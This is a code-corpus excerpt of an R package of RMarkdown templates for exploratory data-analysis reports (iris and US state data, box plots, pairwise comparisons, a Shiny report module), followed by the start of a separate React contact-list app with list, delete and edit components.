root.dir = outputPath)
knitr::opts_knit$set(
root.dir = getwd())
options(warn = 1, width = 200)
```
```{r requiredLibraries}
library(bookdown)
```
<!-- Loading the package with the child templates and functions for the creation of this report. -->
```{r libraries}
library(knitr)
# load R template package
library(exampleRTemplatePackage)
```
```{r inputParameters-data}
# load dataset
data(iris)
## input parameters - data
# 'dataset': data.frame/matrix with variables
dataset <- iris
# 'variables': column names of 'dataset' with numeric variables
variables <- grep("Species", colnames(iris),
invert = TRUE, value = TRUE)
# 'covariate': factor variable with subset of data
covariate <- "Species"
```
```{r inputParameters-analysis}
## input parameters for boxplot
# 'boxplot': boolean, should the 'variables' be represented with a boxplot versus the 'covariate'?
boxPlot <- TRUE
# 'boxplotColorVariables': vector with color for each boxplot
# with names corresponding to the names of the 'variables'
# (for color specific of each variable)
boxPlotColorVariables <- c("red", "magenta", "blue", "cyan")
names(boxPlotColorVariables) <- c("Sepal.Length", "Sepal.Width",
"Petal.Length", "Petal.Width")
## input parameter for pairwise comparison plot of each pair of variables
# 'pairwiseComparison': boolean, should each pair of 'variables'
# be represented in paired scatterplot
# (with the function 'pairwiseComparison' of the package)
pairwiseComparison <- TRUE
# 'pairwiseComparisonPlotColorVariable': column name of the dataset used to
# color the points in the scatterplot
pairwiseComparisonPlotColorVariable <- "Species"
# 'typePlot': type of the plot, either 'baseR', 'ggplot2', 'rbokeh', or 'plotly'
typePlot <- "plotly"
## input parameters for a linear discriminant analysis of the data
# 'includeLda': boolean, should a linear discriminant analysis be executed on the data?
includeLda <- TRUE
# 'covariateLda': column name of 'dataset' with groups for the discriminant analysis
covariateLda <- covariate
# 'dimensionsLda': numeric, number of linear discriminants to be usred for the plot
dimensionsLda <- 4
```
<!-- call/run child template with the analysis, contained in the `exampleReportingPackage` package-->
```{r runAnalysis, child = getPathTemplate("exampleTemplate_child.Rmd")}
```
<file_sep># This bit of code gets the path of the start template contained in the 'exampleRTemplatePackage'
# and copy it to the working directory
###############################################################################
# Install package
# Note: if you want to make use of the templates you might need some or all of the 'suggests' packages as well
# (depending on the requests)
# Load package with template
library(exampleRTemplatePackage)
# Copy child template from the installed package to the working directory
file.copy(from = getPathStartTemplate(), to = "./")
# You can now work/modify the 'startTemplate' file directory towards
# the parameters specific (input parameters/YAML header) of your dataset
<file_sep><!---
INPUT PARAMETERS
-->
```{r boxPlotsChild-inputParameters-{{iBP}}}
boxPlotVariable <- boxPlotVariables[{{iBP}}]
dataBoxPlot <- dataset[dataset[,covariate] == boxPlotVariable, ]
colorBP <- if(exists("boxPlotColorVariables", where = environment())) boxPlotColorVariables else NULL
message("Creation of box plot of ", boxPlotVariable, ".")
```
## Boxplot of `r boxPlotVariable`
```{r boxPlotChild-figCaption-{{iBP}}}
figCaption <- paste0("Box plot for ", tolower(covariate), ": ", boxPlotVariable)
```
Figure \@ref(`r paste0("fig:boxPlotChild-plots-", {{iBP}})`) compares the
distribution of `r toString(variables)` for `r boxPlotVariable`.
```{r boxPlotChild-plots-{{iBP}}, fig.cap = figCaption}
datasetBP <- dataBoxPlot[, variables, drop = FALSE]
datasetBP$ID <- 1:nrow(datasetBP)
suppressPackageStartupMessages(library(reshape2))
mm = melt(datasetBP, id = "ID")
suppressPackageStartupMessages(library(plotly))
p <- plot_ly(mm, y = ~value, color = ~variable, type = "box", colors = colorBP)
p
```<file_sep>
```{r parametersChildDocument}
library(pander)
## required input parameters
message("Check required input parameters")
# check if all require input parameters are specified
variablesToSpecify <- c("dataset", "variables", "covariate")
inputParametersNotSpecified <- !sapply(variablesToSpecify, exists, where = environment())
if(any(inputParametersNotSpecified))
stop("Please specify the ", toString(variablesToSpecify[inputParametersNotSpecified]), ".")
```
```{r parametersChildDocumentDefaults}
## optional input parameters, set to default value if not specified
if(!exists("boxPlot", where = environment())) boxPlot <- TRUE
if(!exists("histogram", where = environment())) histogram <- TRUE
if(!exists("pairwiseComparison", where = environment())){
if(length(variables) > 1 & exists("covariate", where = environment())){
pairwiseComparison <- TRUE
}else pairwiseComparison <- FALSE
}
if(length(variables) <= 1) pairwiseComparison <- FALSE
if(pairwiseComparison & !exists("pairwiseComparisonPlotColorVariable", where = environment()))
pairwiseComparisonPlotColorVariable <- covariate
if(!exists("includeLda", where = environment())){
if(length(variables) > 2 & exists("covariate", where = environment())){
includeLda <- TRUE
}else includeLda <- FALSE
}
if(length(variables) <= 2) includeLda <- FALSE
if(includeLda & !exists("covariateLda", where = environment())) covariateLda <- covariate
if(!exists("typePlot", where = environment())) typePlot <- "rbokeh"
if(!exists("formatOutput", where = environment())) formatOutput <- "html"
```
```{r compareOutputpathWithWd}
message("Compare output path with working directory")
outputPathCompare <- paste0(getwd(), "/")
if(.Platform$OS.type == "windows") outputPathCompare <- paste0("/", paste(unlist(strsplit(outputPathCompare, split = "/"))[-1], collapse = "/"),"/")
# differentWd <- outputPath != outputPathCompare
#
# if(differentWd) warning(paste0('The specified "outputPath" (i.e. ', outputPath,') is NOT the same \n as the current working directory (i.e. ', outputPathCompare, '). \n',
# 'The graphs and objects will be saved in the "outputPath" location, \n while the report (and the css file) will be saved in the working directory.'))
```
```{r copyCustomCssFile}
message("Copy css file from package")
# message("output path css: ", paste0(getwd(), "/css"))
if(!exists("personalCss", where = environment())) personalCss <- FALSE
if(!personalCss){
cssFile <- getPathFile("custom.css")
outputPathCss <- paste0(getwd(), "/css")
if(.Platform$OS.type == "windows") outputPathCss <- paste0("/", paste(unlist(strsplit(outputPathCss, split = "/"))[-1], collapse = "/"))
if (!file.exists(outputPathCss)) dir.create(outputPathCss, recursive = TRUE)
outputPathCss <- paste0(outputPathCss, "/")
copyFile <- file.copy(from = cssFile, to = outputPathCss, overwrite = TRUE)
}
message(". Section Material and methods")
```
# Material and methods
## Data
The dataset contains `r nrow(dataset)` samples, `r length(variables)` variables:
`r toString(variables)`
and `r length(covariate)` covariate: `r toString(covariate)`.
```{r detailsOfData}
message(".. Data table")
switch(formatOutput,
'html' = {
library(DT)
datatable(dataset,
options = list(
searching = TRUE,
pageLength = 10
# lengthMenu = c(5, 10, 15, 20)
),
rownames = FALSE
)
},
'pdf' = pander(dataset)
)
```
## Summary of the data
Tables below show overall statistics of `r toString(variables)` for:
* the entire dataset
* the variables for each subset of the `r paste0("'", covariate, "'")`
covariate:
`r paste(paste(" +", levels(dataset[,covariate])), collapse = "\n")`
<!-- Tables with pander in for loop. -->
```{r summaryDataPander}
message(".. Summary of the data via pander")
library(pander)
panderOptions('knitr.auto.asis', FALSE)
for(subData in c("all", levels(dataset[,covariate]))){
if(subData == "all"){
cat("\n### All", tolower(covariate), "\n\n")
pander(summary(dataset[,variables]), caption = paste("Summary for all", tolower(covariate)))
}else{
cat("\n###", simpleCap(subData, onlyFirst = TRUE), "\n\n")
pander(summary(dataset[dataset[,covariate] == subData,variables]),
caption = paste0("Summary for ", subData))
}
cat("\n\n")
}
```
`r if(boxPlot) "# Box plot"`
```{r boxPlots-viaLoopOnChildDocumentInteger, eval = boxPlot}
## example of call of child documents within a loop
message(". Section box plot - via child documents using integer")
locationBoxPlotDocument <- getPathTemplate("exampleTemplate_boxPlot.Rmd")
# initialize the output
outputBoxPlotDocument <- NULL
# variable for which to print box plots
boxPlotVariables <- unique(dataset[,covariate])
# loop across pairs of variables, with integer
for(iBP in seq(length(boxPlotVariables))){
# extract the code of the child, with variables within {{}} replaced
outputBoxPlotDocument <- c(outputBoxPlotDocument,
knit_expand(locationBoxPlotDocument))
}
# run the document
cat(knit(text = unlist(paste(outputBoxPlotDocument, collapse = '\n')), quiet=TRUE))
```
`r if(histogram) "# Histogram"`
`r if(histogram) paste("Note: we removed the '.' from the character since otherwise bookdown does not return figure numbers.")`
<!-- Via child documents using a character. -->
```{r histogram-viaLoopOnChildDocumentCharacter, eval = histogram}
## example of call of child documents within a loop
message(". Section histogram - via child documents using character")
locationHistogramDocument <- getPathTemplate("exampleTemplate_histogram.Rmd")
# initialize the output
outputHistogramDocument <- NULL
# variable for which to print histogram
histogramVariable <- gsub("\\.", " ", tolower(variables))
histogramVariablesFull <- variables
histogramVariablesDescription <- histogramVariable
names(histogramVariablesFull) <- names(histogramVariablesDescription) <- histogramVariable
# loop across pairs of variables, with character
for(iH in histogramVariable){
iHST <- paste0("'", iH, "'")
# extract the code of the child, with variables within {{}} replaced
outputHistogramDocument <- c(outputHistogramDocument,
knit_expand(locationHistogramDocument))
}
# run the document
cat(knit(text = unlist(paste(outputHistogramDocument, collapse = '\n')), quiet=TRUE))
```
`r if(pairwiseComparison) "# Pairwise comparison plot"`
`r if(pairwiseComparison)
"## Summary\nFollowing Figure shows the correlation matrix of all variables contained in the data."`
```{r pairwiseComparison-summary, eval = pairwiseComparison}
library(corrplot)
inputCorrplot <- cor(dataset[, variables])
corrplot.mixed(inputCorrplot, order = "hclust")
```
```{r pairwiseComparisonPlots-viaLoopOnChildDocumentInteger, eval = pairwiseComparison}
message(". Section pairwise comparison - via loop on plots")
message(".. Pairwise comparison plots via child documents using an integer")
## path child template
locationPairwiseComparisonPlotDocument <-
getPathTemplate("exampleTemplate_pairwiseComparison.Rmd")
## input parameters
# matrix with different pairs of variables (columns)
pairwiseComparisonVariables <- combn(variables, 2)
# description of the comparison as text
pairwiseComparisonVariablesDescriptions <- apply(pairwiseComparisonVariables, 2,
paste, collapse = " and ")
## run the document
outputPairwiseComparisonPlotDocument <- NULL # initialize the output
# loop across pairs of variables, with character
for(iPC in 1:ncol(pairwiseComparisonVariables)){
# extract the code of the child, with variables within {{}} replaced
outputPairwiseComparisonPlotDocument <- c(outputPairwiseComparisonPlotDocument,
knit_expand(locationPairwiseComparisonPlotDocument))
}
# run the document
cat(knit(text = unlist(
paste(outputPairwiseComparisonPlotDocument, collapse = '\n')),
quiet = TRUE)
)
```
`r if(includeLda) "# Linear discriminant analysis"`
`r if(includeLda) knit_child(getPathTemplate("exampleTemplate_lda.Rmd"))`
# Appendix
## Used software
```{r usedSoftware}
printSessionInfoMarkdown()
```
_Template developed by <NAME> and <NAME>, Open Analytics._
<file_sep>#' UI module function to include buttons to run/retrieve qPCR report from Shiny app
#' @param id module identifier
#' @param labelReport string, label for the report
#' @return tagList with:
#' \itemize{
#' \item{action button to run report execution}
#' \item{progress message output}
#' \item{download button to retrieve report}
#' }
#' @author <NAME>
runReportShinyUI <- function(id, labelReport){
ns <- NS(id)
tagList(
actionButton(
ns("createReport"),
label = paste("Create", labelReport, "report"),
style = "background-color: #32a6d3"
),
uiOutput(ns("progressMessageReport")),
br(),
conditionalPanel(
condition = paste0("output['", ns("reportCreated"), "'] == true "),
downloadButton(
ns("getReport"),
label = paste("Get", labelReport, "Report"),
style = "background-color: #e6e6e6"
)
)
)
}
#' server module function to include buttons to run/retrieve qPCR report from Shiny app
#' @param input shiny input object
#' @param output shiny output object
#' @param session shiny session object
#' @param labelReport string with label for the report
#' @param outputDir reactive expression with output directory string
#' @param params reactive expression with list of parameters filled in the interface
#' @param dataFiles reactive expression with \code{fileInput} for data files
#' @param sampleAnnotationFile reactive expression with \code{fileInput} for sample annotation file
#' @param outputSubdirectoryToKeep string with subdirectory to keep
#' for cleaning of \code{outputDir}
#' @return no returned value
#' @author <NAME>
runReportShiny <- function(input, output, session,
labelReport,
outputDir, paramsUI, dataset, variables, covariate
){
outputReportName <- reactive(
paste0(outputDir, "analysisDataset-", gsub(" ", "", paramsUI()$dataset), ".",
"html")
)
output$reportCreated <- reactive(FALSE)
observeEvent(input$createReport, {
print(paste("report button clicked: output directory is", outputDir))
# in case previous execution
output$reportCreated <- reactive(FALSE)
outputOptions(output, "reportCreated", suspendWhenHidden = FALSE)
# use if statement for error because validate doesn't work within observeEvent
if(!is.null(dataset())){
params <- paramsUI()
params$datasetName <- params$dataset
# output directory used in report
params$dataset <- dataset()
params$variables <- variables()
params$covariate <- covariate()
params$outputPath <- outputDir
params$formatOutput <- "html"
# # clean results previous execution
# filesAlreadyPresent <- list.files(outputDir(), full.names = TRUE)
# if(!is.null(outputSubdirectoryToKeep))
# filesAlreadyPresent <- filesAlreadyPresent[
# filesAlreadyPresent != file.path(outputDir(), outputSubdirectoryToKeep)
# ]
# unlink(filesAlreadyPresent, recursive = TRUE)
# create output directory
# dir.create(params$dataDir, recursive = TRUE)
# for testing/debugging
save(params, file = file.path(outputDir, "params.RData"))
# print(outputDir())
nameReport <- "masterTemplate.Rmd"
pathQC <- exampleRTemplatePackage::getPathTemplate(nameReport)
withProgress(
message = paste("Creation of the", labelReport, "report in progress"),
detail = "This may take a few minutes", {
pathOutput <- file.path(outputDir, nameReport)
# copy start template
file.copy(from = pathQC, to = pathOutput, overwrite = TRUE)
# outputOptions <- list(
# 'toc' = TRUE,
# 'toc_depth' = 4,
# 'number_sections' = TRUE#,
## 'always_allow_html' = TRUE
# )
#
## if(paramsUI()$formatOutput == "html")
# outputOptions <- c(outputOptions,
# list('css' = "css/custom.css",
# 'toc_float' = TRUE)
# )
# run template
library(bookdown)
potentialErrorMessage <- try(
res <- rmarkdown::render(
input = pathOutput,
output_file = outputReportName(),
params = params,
envir = new.env(),
# output_format = switch(
# paramsUI()$formatOutput,
# 'html' = "html_document2",
# 'pdf' = "pdf_document2"
# ),
# output_options = outputOptions
)
, silent = TRUE)
}
)
if(inherits(potentialErrorMessage, "try-error")){
output$progressMessageReport <- renderUI(
div(strong(paste("The", labelReport, "report didn't run:", potentialErrorMessage)),
style = "color:red"))
}else{
output$progressMessageReport <- renderUI(div(
paste("Creation of the", labelReport, "report is successful."),
style = "color:green"))
output$reportCreated <- reactive(TRUE)
outputOptions(output, "reportCreated", suspendWhenHidden = FALSE)
}
}else{
output$progressMessageReport <- renderUI(
div("Data file(s) should be provided", style = "color:red"))
}
})
reportResults <- reactive({
file.path(outputDir, outputReportName())
})
observe({
output$getReport <- downloadHandler(
filename = function() outputReportName(),
content = function(file){
file.copy(from = reportResults(), to = file)
}#, contentType = "application/pdf"
)
})
}<file_sep>---
title: "Example 4: State data (pairwise comparison and linear discriminant analysis)"
author: "<NAME>, <NAME>, OpenAnalytics"
date: "`r format(Sys.time(), '%d %B %Y')`"
output:
bookdown::html_document2:
css: css/custom.css
toc: true
toc_depth: 4
number_sections: true
toc_float:
collapsed: true
---
<!---
Copy this template in your working directory (where you want to run the report).
You can make use of the function getPathStartTemplate().
This template can be used as a starting document for any new dataset
-->
```{r runDocument, echo = FALSE, eval = FALSE}
## This chunk contains code to render the document.
rm(list = ls())
detach('package:exampleRTemplatePackage', unload = TRUE);library(exampleRTemplatePackage)
system.time(rmarkdown::render("example4.Rmd"))
```
```{r inputOutputPath, echo = FALSE}
# working directory as output path
# outputPath <- file.path(getwd(), "")
# different folder as output path
outputPath <- file.path(getwd(), "output/")
if (!file.exists(outputPath)) dir.create(outputPath, recursive = TRUE)
# When working on a windows computer it should be "/Users/..." instead of "C:/Users/..."
if(.Platform$OS.type == "windows") outputPath <- paste0("/", paste(unlist(strsplit(outputPath, split = "/"))[-1], collapse = "/"),"/")
```
```{r optionsChunk, echo = FALSE, message = FALSE, warning=FALSE}
## Chunk with options for knitr. This chunk should not be modified.
knitr::opts_chunk$set(
eval = TRUE,
echo = FALSE,
message = FALSE,
cache = FALSE,
warning = FALSE,
error = FALSE,
comment = "#",
tidy = FALSE,
collapse = TRUE,
results = "asis",
root.dir = outputPath)
knitr::opts_knit$set(
root.dir = getwd())
options(warn = 1, width = 200)
```
```{r requiredLibraries}
library(bookdown)
```
<!-- Loading the package with the child templates and functions for the creation of this report. -->
```{r libraries}
library(knitr)
# load R template package
library(exampleRTemplatePackage)
```
```{r inputParameters-data}
# load data
data(state)
# input parameters - data
dataset <- data.frame(state.x77,
region = state.region,
division = state.division
)
variables <- grep("region|division", colnames(dataset),
invert = TRUE, value = TRUE)
covariate <- "region"
```
```{r inputParameters-analysis}
boxPlot <- FALSE
pairwiseComparisonPlot <- TRUE
pairwiseComparisonPlotColorVariable <- covariate
typePlot <- "baseR"
includeLda <- TRUE
covariateLda <- covariate
dimensionsLda <- 3
```
<!-- call/run child template -->
```{r runAnalysis, child = getPathTemplate("exampleTemplate_child.Rmd")}
```
<!-- call the child template with the analysis, contained in the `exampleReportingPackage` package -->
<file_sep>
```{r pairwiseComparisonChild-inputParameters-{{iPC}}}
pairwiseComparisonVariablesDescription <- pairwiseComparisonVariablesDescriptions[{{iPC}}] # description
pairwiseComparisonVariable <- pairwiseComparisonVariables[, {{iPC}}] # variables to compare
colorVariable <- if(exists("pairwiseComparisonPlotColorVariable", where = environment()))
pairwiseComparisonPlotColorVariable # variable used for coloring
if(!exists("typePlot", where = environment())) typePlot <- "rbokeh" # type plot
message("Creation of pairwise comparison plot of ", pairwiseComparisonVariablesDescription, ".")
```
## Pairwise comparison of `r pairwiseComparisonVariablesDescription`
```{r pairwiseComparisonChild-correlationTest-{{iPC}}}
resCorTest <- cor.test(
x = dataset[, pairwiseComparisonVariable[1]],
y = dataset[, pairwiseComparisonVariable[2]]
)
```
The **_Pearson_ correlation** between the
`r pairwiseComparisonVariablesDescription` is:
**`r round(resCorTest$estimate, 2)`** (p-value =
`r format(resCorTest$p.value, scientific = TRUE, digits = 2)`).
```{r pairwiseComparisonChild-extractData-{{iPC}}}
# color palette
library(oaColors)
colorPalette <- oaPalette(
numColors = ifelse(!is.null(colorVariable), nlevels(dataset[, colorVariable]), 1))
names(colorPalette) <- if(!is.null(colorVariable)) levels(dataset[, colorVariable]) else "all points"
figCaption <- paste("Pairwise comparison of", pairwiseComparisonVariablesDescription)
```
Figure \@ref(`r paste0("fig:pairwiseComparisonChild-plots-", {{iPC}})`) shows
the pairwise comparison plot of `r pairwiseComparisonVariablesDescription`.
```{r pairwiseComparisonChild-plots-{{iPC}}, fig.cap = figCaption, results = ifelse(typePlot %in% c("rbokeh", "plotly"), 'markup', "asis")}
pairwiseComparisonPlot(
dataset = dataset,
variables = pairwiseComparisonVariable,
description = pairwiseComparisonVariablesDescription,
colorVariable = colorVariable,
colorPalette = colorPalette,
typePlot = typePlot)
```<file_sep>#' get path of a file contained in the 'templates' folder of the \code{exampleRTemplatePackage} library
#' @param file string, name of the template file
#' @param userType string, use type, either:
#' \itemize{
#' \item{'user': }{the template path is extracted from the installed \code{exampleRTemplatePackage} library}
#' \item{'developer:' }{the name of the template is returned, assuming that the developer works
#' in the 'inst/templates' folder of the package directly
#' }
#' }
#' @return string with output path(s) of the specified file
#' @author <NAME> and <NAME>
#' @export
getPathFile <- function(file, userType = c("user", "developer")){
userType <- match.arg(userType)
switch(userType,
'user' = system.file(file.path("templates", file), package = "exampleRTemplatePackage"),
'developer' = file
)
}
#' get path of template
#' @param template string, name of the template file
#' @inherit getPathFile params return
#' @author <NAME> and <NAME>
#' @export
getPathTemplate <- function(template, userType = c("user", "developer")){
getPathFile(file = template, userType = userType)
}
#' get path of start template contained in the \code{exampleRTemplatePackage} package
#' @return path of start template, from the installed \code{exampleRTemplatePackage} library
#' @author <NAME> and <NAME>
#' @export
getPathStartTemplate <- function(){
system.file("templates/start/startTemplate.Rmd", package = "exampleRTemplatePackage")
}
#' Function to create collapse with button in html output
#' @param input the text or function (see type) that should be printed
#' @param id the id of the environment
#' @param titleButton the title of the button
#' @param type whether the input is a function or text
#' @param color the color of the text in the button
#' @param borderColor the color of the border of the button
#' @return html code with input in a collapsible environment
#' @author <NAME>
#' @export
collapseInHtml <- function(input, id, titleButton, type = c("function", "text"), color = "#479ace", borderColor = "#479ace"){
id <- gsub("[(]|[)]|[.]| ", "",id)
cat(paste0("<button type=\"button\" class=\"btn\" style=\"color:", color, " !important;border-color:",
borderColor, " !important; background-color: white !important\" id=\"buttonId\" data-toggle=\"collapse\" title=\"", paste0("Click to show or hide ", tolower(titleButton)),"\"
data-target=\"#", id, "\">", titleButton, " ", "<span class=\"caret\"></span>", "</button>"))
cat(paste0("<div id=\"", id, "\" class=\"collapse buttonArrow\">"))
res <- switch(type,
'function' = input(),
"text" = cat(input))
cat("\n\n")
cat("</div>")
if(type == "function") return(res)
}
#' format the sessionInfo output for markdown
#' (sort packages for each slot)
#' @param order, string, either 'alphabetically' or 'original',
#' depending if the strings in each slot (e.g. the packages in 'attached base packages') should be
#' sorted alphabetically or if no sorting should be done
#' @param addVersionBioconductor logical, if TRUE (FALSE by default) print also Bioconductor version (BiocInstaller)
#' @return no returned value, the reformatted output of sessionInfo is printed in the current console
#' @importFrom utils capture.output packageDescription packageVersion
#' @author <NAME>
#' @export
printSessionInfoMarkdown <- function(order = c("alphabetically", "original"), addVersionBioconductor = TRUE){
order <- match.arg(order)
# get ourput of sessionInfo
sessionInfo <- capture.output(print(sessionInfo()))
idxEmpty <- which(sessionInfo == "")
sessionInfo <- sessionInfo[!(1:length(sessionInfo)) %in% idxEmpty]
# idx of elements to paste intop one string
idxToPaste <- which(grepl("\\[[[:digit:]]{1,}\\]", sessionInfo))
idxSep <- c(0, which(diff(idxToPaste) != 1), length(idxToPaste))
# idx of elements to paste
idxToPasteSplit <- sapply(1:(length(idxSep)-1), function(i) idxToPaste[(idxSep[i]+1):(idxSep[i+1])])
# paste the elements with ', '
elPaste <- sapply(idxToPasteSplit, function(i){
res <- gsub("^ *|\\[[[:digit:]]{1,}\\]| *$", "", sessionInfo[i])
res2 <- c(sapply(res, function(x){
res1 <- strsplit(x, split = " ")[[1]]; res1[res1!=""]#paste(res1[res1!=""], collapse = ", ")
}))
res2Vector <- unlist(res2)
paste(
switch(order, 'alphabetically' = sort(res2Vector), 'original' = res2Vector),
collapse = ", ")
})
# idx of elements to keep from sessionInfo
idxKept <- which(!(1:length(sessionInfo)) %in% idxToPaste)
# create the final output
idxAddedInit <- c(which(diff(idxKept) > 1), length(idxKept)) + 1
# idx of pasted elements
idxAdded <- idxAddedInit + 0:(length(idxAddedInit)-1)
resFinal <- rep("", length(idxKept) + length(idxAdded))
resFinal[idxAdded] <- elPaste
# idx of elements kept from the sessionInfo
resFinal[resFinal == ""] <- sessionInfo[idxKept]
# add list in markdown
idxList <- idxAdded-1
resFinal[idxList] <- paste0("* ", resFinal[idxAdded-1], "\n")
idxNotList <- !(1:length(resFinal)) %in% idxList
resFinal[idxNotList] <- paste0(resFinal[idxNotList], "\n\n")
# print the result into the console
cat(resFinal)
if(addVersionBioconductor){
if(!requireNamespace("BiocInstaller", quietly = TRUE)){
cat("* Bioconductor (BiocInstaller) version:",
as.character(packageVersion("BiocInstaller")))
}
}
}
#' get prefix for section in markdown ('#') for a number of level
#' @param level integer, level of section, e.g. 2
#' @return string with prefix for section, e.g. '##'
#' @author <NAME>
#' @export
getPrefixSection <- function(level){
paste(rep("#", level), collapse = "")
}
#' capitalize the first letter of a word, from the help of the 'toupper' function
#' @param x string
#' @param onlyFirst logical, if TRUE (FALSE by default)
#' capitalize the first letter of the first forward only
#' @param rev logical, if TRUE (FALSE by default), set first letter to lower case (otherwise upper case)
#' @return string with first letter capitalized
#' @author author of the 'toupper' function?
#' @export
simpleCap <- function(x, onlyFirst = FALSE, rev = FALSE) {
paste0c <- function(...) paste(..., sep = "", collapse = " ")
fctToUse <- get(ifelse(rev, "tolower", "toupper"))
simpleCap1 <- function(s) paste0c(fctToUse(substring(s, 1, 1)), substring(s, 2))
sapply(x, function(x){
s <- strsplit(x, " ")[[1]]
if(onlyFirst) paste0c(c(simpleCap1(s[1]), s[-1])) else simpleCap1(s)
})
}<file_sep>shinyServer(function(input, output, session) {
includeCSS("./www/custom.css")
# load dataset
dataset <- reactive({
switch(input$dataset,
'iris' = {
data(iris)
iris
},
'warpbreaks' = {
data(warpbreaks)
warpbreaks$warp <- factor(with(warpbreaks, paste0(wool, tension)))
warpbreaks
},
'Pima Indians Diabetes' = {
library(mlbench)
data(PimaIndiansDiabetes)
PimaIndiansDiabetes
},
'US states' = {
data(state)
# input parameters - data
dataset <- data.frame(state.x77,
region = state.region,
division = state.division
)
}
)
})
# specify variables
variables <- eventReactive(
dataset(), {
switch(input$dataset,
'iris' = grep("Species", colnames(dataset()), invert = TRUE, value = TRUE),
'warpbreaks' = "breaks",
'Pima Indians Diabetes' = grep("diabetes", colnames(dataset()), invert = TRUE, value = TRUE),
'US states' = grep("region|division", colnames(dataset()), invert = TRUE, value = TRUE)
)
})
output$moreThanOneVariable <- reactive(print(length(variables()) > 1))
outputOptions(output, "moreThanOneVariable", suspendWhenHidden = FALSE)
output$moreThanTwoVariables <- reactive(print(length(variables()) > 2))
outputOptions(output, "moreThanTwoVariables", suspendWhenHidden = FALSE)
# specify covariate
covariate <- eventReactive(
dataset(), {
switch(input$dataset,
'iris' = "Species",
'warpbreaks' = "warp",
'Pima Indians Diabetes' = "diabetes",
'US states' = "region"
)
})
callModule(
# module specific
module = runReportShiny, id = "analysis",
labelReport = "analysis",
# parameters not in modules
outputDir = outputDir,
paramsUI = reactive(reactiveValuesToList(input)),
dataset = dataset,
variables = variables,
covariate = covariate
)
})
<file_sep>#' wrapper to generate pairwise comparison plot
#' @param dataset data.frame with data
#' @param variables columns of \code{dataset} with variable for x and y
#' @param description text description of the pairwise comparison (used for the title)
#' @param colorVariable column of \code{dataset} with color variable
#' @param colorPalette string with color palette, if \code{colorVariable}
#' \itemize{
#' \item{is specified: }{named string with color for each level (name) of \code{colorVariable}}
#' \item{is not specified: }{unique element}
#' }
#' @param typePlot string with type of the plot, either 'baseR' (\code{plot}),
#' 'ggplot2', 'plotly', 'rbokeh'
#' @return no returned value, a plot is drawn in the current window
#' @importFrom graphics plot
#' @author <NAME>
#' @export
pairwiseComparisonPlot <- function(
dataset, variables,
description,
colorVariable = NULL, colorPalette = "black",
typePlot = c("baseR", "ggplot2", "plotly", "rbokeh")){
typePlot <- match.arg(typePlot)
titlePlot <- paste("Pairwise comparison of", description)
if(typePlot == 'baseR'){
plot(dataset[, variables], pch = 19,
col = if(!is.null(colorVariable)) colorPalette[dataset[, colorVariable]] else colorPalette,
main = titlePlot)
}else if(typePlot %in% c("ggplot2", "plotly")){
if(!requireNamespace("ggplot2", quietly = TRUE))
stop(paste("The package 'ggplot2' need to be loaded to create the plot."))
aesStringsArgs <- c(
list(
x = variables[1],
y = variables[2]
),
if(!is.null(colorVariable))
list(col = colorVariable)
)
gg <- ggplot(data = dataset) + # dataset[, c(variables, colorVariable)]
geom_point(do.call("aes_string", aesStringsArgs)) +
scale_colour_manual(values = colorPalette) +
ggtitle(titlePlot)
if(typePlot == "ggplot2") print(gg)
if(typePlot == "plotly"){
if(!requireNamespace("plotly", quietly = TRUE))
stop(paste("The package 'plotly' need to be loaded to create the plot."))
plotly::ggplotly(p = gg)
}
}else if(typePlot == "rbokeh"){
if(!requireNamespace("rbokeh", quietly = TRUE))
stop(paste("The package 'rbokeh' need to be loaded to create the plot."))
color <- if(!is.null(colorVariable)) colorVariable else colorPalette
f <- rbokeh::figure(title = titlePlot)
# rownames(dataset) <- paste0("sample", 1:nrow(dataset))
rbokeh::ly_points(
fig = f,
data = dataset, #dataset[, c(variables, colorVariable)]
x = variables[1],
y = variables[2],
# currently cannot specify an aesthetic and palette in rbokeh
color = color#,
# hoover = paste(paste0("@", colnames(dataset)[1]), collapse = "\n")
)
}
}
| 6a874b67c0cc34dfc634dad5db9238b34c8d32ce | [
"R",
"RMarkdown"
] | 15 | RMarkdown | isabella232/useR2017_templatePackageExample | 9df299d600799e9661ad4a1750b9334140fc7adf | 6e64eee99443e233427da1c39795339ac8b2b3c2 |
refs/heads/master | <repo_name>zerovan/reactProject<file_sep>/src/components/Contacts.js
import React, { Component } from 'react';
import Detail from './Detail.js';
import { Consumer } from '../context';
class Contacts extends Component {
render() {
return (
<Consumer>
{value => {
const { contacts } = value;
console.log(contacts);
return (
<React.Fragment>
{contacts.map(row => (
<Detail key={row.id} contact={row} />
)
)}
</React.Fragment>
);
}}
</Consumer>
);
}
}
export default Contacts;<file_sep>/src/components/Detail.js
import React, { Component } from 'react';
import propType from 'prop-types';
import { Consumer } from '../context';
import { Link } from 'react-router-dom';
class Detail extends Component {
state = {
count: false
};
Myclick(e) {
this.setState({
count: !this.state.count
});
}
trash = (id, dispatch) => {
const action = {
type: "DELETE_CONTACT",
payload: id
}
dispatch(action);
}
update = (id, dispatch) => {
}
render() {
const contact = this.props.contact;
return (
<Consumer>
{value => {
return (
<React.Fragment>
<h1>
<div className="container">
{this.state.count ?
(<div className='alert alert-primary'>
<span onClick={this.Myclick.bind(this)}>{contact.name}</span>
<span className="float-right px-2"><i className="fa fa-trash" onClick={this.trash.bind(this, contact.id, value.dispatch)}></i></span>
<span className="float-right px-2"><Link to={`/edit/${contact.id}`} ><i className="fa fa-pen"></i></Link></span>
</div>) :
(<div className='alert alert-danger'>
<span onClick={this.Myclick.bind(this)}>{contact.phone}</span>
<span className="float-right px-2"><i className="fa fa-trash" onClick={this.trash.bind(this, contact.id, value.dispatch)}></i></span>
<span className="float-right px-2"><Link to={`/edit/${contact.id}`} ><i className="fa fa-pen"></i></Link></span>
</div>)
}
</div>
</h1>
</React.Fragment>
);
}
}
</Consumer>
);
}
}
Detail.propType = {
contact: propType.object.isRequired
}
export default Detail;
<file_sep>/src/components/Edit.js
import React, { Component } from 'react'
import { Consumer } from '../context';
import InputDryCode from './header/InputDryCode';
class Edit extends Component {
constructor() {
super();
this.flag = true;
}
state = {
name: "",
phone: "",
error: {},
}
onSubmitEditContact = (id, callback, e) => {
e.preventDefault();
if (this.state.name === "") {
this.setState({
error: {
name: "نام باید وارد شود",
}
});
return;
}
if (this.state.phone === "") {
this.setState({
error: {
phone: "موبایل باید وارد شود",
}
});
return;
}
const newContact = {
id,
name: this.state.name,
phone: this.state.phone,
}
const action = {
type: 'EDIT_CONTACT',
payload: newContact,
}
callback(action);
this.props.history.push("/details");
}
updateFirstState = (name, phone) => {
this.setState({
name,
phone,
error: {},
})
this.flag = false;
}
